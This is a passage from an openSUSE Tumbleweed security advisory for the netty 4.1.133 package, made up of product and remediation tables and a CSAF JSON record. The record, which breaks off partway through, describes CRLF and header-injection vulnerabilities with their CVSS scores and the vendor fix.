|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
8.2 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
38 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "netty-4.1.133-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10795",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10795-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-41417 page",
"url": "https://www.suse.com/security/cve/CVE-2026-41417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42578 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42578/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42579 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42579/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42580 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42580/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42581 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42582 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42582/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42583 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42583/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42584 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42584/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42585 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42585/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42586 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42586/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42587 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42587/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44248 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44248/"
}
],
"title": "netty-4.1.133-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-16T00:00:00Z",
"generator": {
"date": "2026-05-16T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10795-1",
"initial_release_date": "2026-05-16T00:00:00Z",
"revision_history": [
{
"date": "2026-05-16T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.aarch64",
"product": {
"name": "netty-4.1.133-1.1.aarch64",
"product_id": "netty-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.aarch64",
"product": {
"name": "netty-bom-4.1.133-1.1.aarch64",
"product_id": "netty-bom-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product_id": "netty-javadoc-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.aarch64",
"product": {
"name": "netty-parent-4.1.133-1.1.aarch64",
"product_id": "netty-parent-4.1.133-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-4.1.133-1.1.ppc64le",
"product_id": "netty-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product_id": "netty-bom-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product_id": "netty-javadoc-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product_id": "netty-parent-4.1.133-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.s390x",
"product": {
"name": "netty-4.1.133-1.1.s390x",
"product_id": "netty-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.s390x",
"product": {
"name": "netty-bom-4.1.133-1.1.s390x",
"product_id": "netty-bom-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product": {
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product_id": "netty-javadoc-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.s390x",
"product": {
"name": "netty-parent-4.1.133-1.1.s390x",
"product_id": "netty-parent-4.1.133-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.x86_64",
"product": {
"name": "netty-4.1.133-1.1.x86_64",
"product_id": "netty-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.x86_64",
"product": {
"name": "netty-bom-4.1.133-1.1.x86_64",
"product_id": "netty-bom-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product_id": "netty-javadoc-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.x86_64",
"product": {
"name": "netty-parent-4.1.133-1.1.x86_64",
"product_id": "netty-parent-4.1.133-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64"
},
"product_reference": "netty-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.s390x"
},
"product_reference": "netty-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64"
},
"product_reference": "netty-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64"
},
"product_reference": "netty-bom-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-bom-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x"
},
"product_reference": "netty-bom-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64"
},
"product_reference": "netty-bom-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-javadoc-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x"
},
"product_reference": "netty-javadoc-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64"
},
"product_reference": "netty-parent-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-parent-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x"
},
"product_reference": "netty-parent-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
},
"product_reference": "netty-parent-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-41417"
}
],
"notes": [
{
"category": "general",
"text": "Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-41417",
"url": "https://www.suse.com/security/cve/CVE-2026-41417"
},
{
"category": "external",
"summary": "SUSE Bug 1264350 for CVE-2026-41417",
"url": "https://bugzilla.suse.com/1264350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-41417"
},
{
"cve": "CVE-2026-42578",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42578"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42578",
"url": "https://www.suse.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "SUSE Bug 1265243 for CVE-2026-42578",
"url": "https://bugzilla.suse.com/1265243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
